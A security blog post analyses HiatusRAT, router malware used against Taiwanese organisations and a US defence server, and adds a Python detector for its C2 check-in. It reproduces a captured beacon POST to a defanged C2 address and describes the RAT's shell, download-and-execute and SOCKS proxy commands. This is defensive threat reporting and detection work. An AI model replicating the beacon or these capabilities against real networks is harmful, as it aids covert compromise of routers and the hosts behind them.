First, the attacks on these well-known organisations and companies. The long-running campaign against Taiwanese companies and at least one government organisation was reported in August 2023, when Lumen researchers who had previously studied the HiatusRAT botnet noticed a new flow of connections from Taiwanese IP address ranges. Soon after, attacks on chemical producers, semiconductor manufacturers and a municipality were uncovered.

The US Department of Defense case is somewhat different. The same research group saw traffic to the botnet's IP addresses coming not only from Taiwan but also from the US; specifically, the operators used one of the RAT's Tier 2 servers to connect to a DoD server used for defence contract work. Fortunately no deeper intrusion was observed, and the activity most likely amounted to reconnaissance ahead of further action.

HiatusRAT Analysis

The first thing to notice about Hiatus is its network architecture. Instead of infecting endpoints it targets networking devices, and has done so since its emergence in late 2021. Routers carry enormous volumes of traffic, and full control over one can yield more than compromising the computers behind it. Nothing prevents Hiatus from delivering additional payloads to those systems, and a network of compromised routers also serves as a proxy layer that hides the operators' real IP addresses from their targets.

HiatusRAT functional scheme

To spread the payload, the attackers look for business-grade routers running vulnerable firmware. The first infected devices were DrayTek Vigor 2960 and 3900 routers; the malware now has builds for Arm, i386, x86-64 and MIPS/MIPS64, which covers a very large number of devices, since network infrastructure firmware is patched even more reluctantly than ordinary software.

Execution flow

The initial access vector that puts the RAT on the router is still unclear. What is clear is that, once in, the attackers run a shell script that downloads the payload and an auxiliary utility: a modified build of tcpdump, the command-line packet capture tool.

On execution, HiatusRAT first checks whether another process is listening on TCP port 8816 and, if so, kills it before starting normally. Then comes a fairly standard step: it gathers basic information about the device, including its MAC address, architecture, firmware and kernel versions, and enumerates the mounted file systems and the files they contain.

Once those checks are done, the malware reads a small embedded JSON configuration holding the C2 addresses. Besides the main heartbeat server there is a second server that receives the packet captures collected by the modified tcpdump. The first request to the control server is a plain HTTP POST carrying several fields of the system information gathered in the previous step.

HTTP POST Request Example
POST /master/Api/active?uuid=005056c00001 HTTP/1.1
Host: 104.250.48[.]192:443
Accept: */*
Content-Type: application/json
X_UTIME: 1674762549
X_UUID: 005056c00001
X_TOKEN: ffca0c6ca91ce7070c3e5e41d7c983a2
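As an added example that is not part of the original post or of Lumen's tooling, the function below scores a raw HTTP request against the beacon shape quoted above: the POST to /master/Api/active with a uuid query parameter, the non-standard X_UTIME, X_UUID and X_TOKEN headers, and the internal consistency between them (the query uuid equals X_UUID, the token is 32 hex characters, the time is a plausible Unix epoch). The epoch bounds and the reading of uuid as a 12-hex, MAC-shaped identifier are assumptions; the benign request is constructed for contrast, and the IP in the sample is kept defanged as on the page.

```python
"""Score raw HTTP requests for the HiatusRAT check-in pattern (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

BEACON_PATH = "/master/Api/active"
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)  # X_TOKEN in the sample is MD5-shaped
HEX12 = re.compile(r"^[0-9a-f]{12}$", re.I)  # uuid in the sample looks like a MAC (assumption)

# The request quoted in the post (defanged host kept as-is) and a constructed benign request.
SAMPLE = """POST /master/Api/active?uuid=005056c00001 HTTP/1.1
Host: 104.250.48[.]192:443
Accept: */*
Content-Type: application/json
X_UTIME: 1674762549
X_UUID: 005056c00001
X_TOKEN: ffca0c6ca91ce7070c3e5e41d7c983a2

"""
BENIGN = """POST /api/v1/login HTTP/1.1
Host: example.com
Content-Type: application/json

"""


def parse_request(raw: str):
    """Split a raw HTTP request into (method, target, headers); header names are
    lower-cased, the body is ignored, and a request line wrapped in quotes (as in
    the post's capture) is tolerated."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    method, target, _version = lines[0].strip().strip('"').split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def score_hiatus_beacon(raw: str) -> list:
    """Return the list of matched indicators; several together make a confident hit."""
    method, target, h = parse_request(raw)
    url = urlsplit(target)
    uuid_q = parse_qs(url.query).get("uuid", [""])[0]
    hits = []
    if method == "POST" and url.path == BEACON_PATH:
        hits.append("path")
    if HEX12.match(uuid_q):
        hits.append("uuid_in_query")
    if {"x_utime", "x_uuid", "x_token"}.issubset(h):
        hits.append("underscore_headers")  # underscores in header names are non-standard
        if h["x_uuid"] == uuid_q:
            hits.append("uuid_consistent")
        if HEX32.match(h["x_token"]):
            hits.append("md5_shaped_token")
        # Assumed sanity window for a Unix timestamp (2020 to 2033).
        if h["x_utime"].isdigit() and 1_600_000_000 < int(h["x_utime"]) < 2_000_000_000:
            hits.append("epoch_utime")
    return hits


if __name__ == "__main__":
    print("sample:", score_hiatus_beacon(SAMPLE))
    print("benign:", score_hiatus_beacon(BENIGN))
```

Because the path alone is a weak indicator, the function reports every matched property separately so an analyst can set a threshold; the cross-field checks (X_UUID matching the query parameter, a hex token of fixed width) are what distinguish this beacon from an ordinary JSON API call.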

HiatusRAT Functionality

The tcpdump-like tool already mentioned supplies a significant part of the RAT's functionality, but not all of it. Hiatus accepts commands from the control server that change its behaviour or make it shut down entirely. Notably, some of these functions had not yet been seen in use, even though they have been present since the malware's first release in 2021.

Commands and what they do:
  • Socks5: sets up a SOCKS5 proxy (RFC 1928) on the compromised device, allowing port forwarding and listening.
  • File: reads, deletes or uploads a specified file on the infected host.
  • Executor: downloads a file from the command server and executes it.
  • Tcp_forward: takes a forwarding IP and listening/forwarding port configuration and applies it to the router, which then forwards any TCP traffic received on the listening port.
  • Script: like Executor, but downloads and runs a script from the C2.
  • Shell: spawns a remote shell on the compromised router. Together with Executor and Script, this provides the malware delivery capability.
  • Quit: terminates the malware and stops all its operations.

How to protect against network infrastructure attacks?

Hiatus used to target routers of a specific architecture and series, but it now covers a wide range of devices. Since the way the operators deploy it is still unclear, there are few reactive measures to recommend; instead, here are several proactive ones to stick to.

Use advanced network protection solutions. Antivirus software on endpoints does little to prevent this RAT, which lives on the router. Network protection that leans on heuristics can detect and evict the intruder by its behaviour alone, and Network Detection and Response systems, combined with SOAR and UBA solutions, do well against malware of this kind. On devices you can inspect, the indicators described above are what to look for: an unexpected listener on TCP port 8816, an unfamiliar tcpdump binary, and outbound POST requests carrying X_UUID and X_TOKEN headers.

Update (or replace) your networking devices regularly. Since vulnerable router firmware is the entry point, keeping it patched is essential. Watch for malware campaigns that exploit vulnerabilities in networking devices; manufacturers usually release fixes within weeks. Some older devices, however, have reached end of life and receive no support at all, and in that case replacing the device is the only reliable way to remove the risk.

Keep good anti-malware software on hand. Having just said that anti-malware programs are not very effective here, recommending one may look inconsistent, but it is not: endpoint anti-malware is the preventive layer against the payloads HiatusRAT can deliver to the hosts behind the router. Multi-layered security is always harder to penetrate, at least without triggering an alarm.
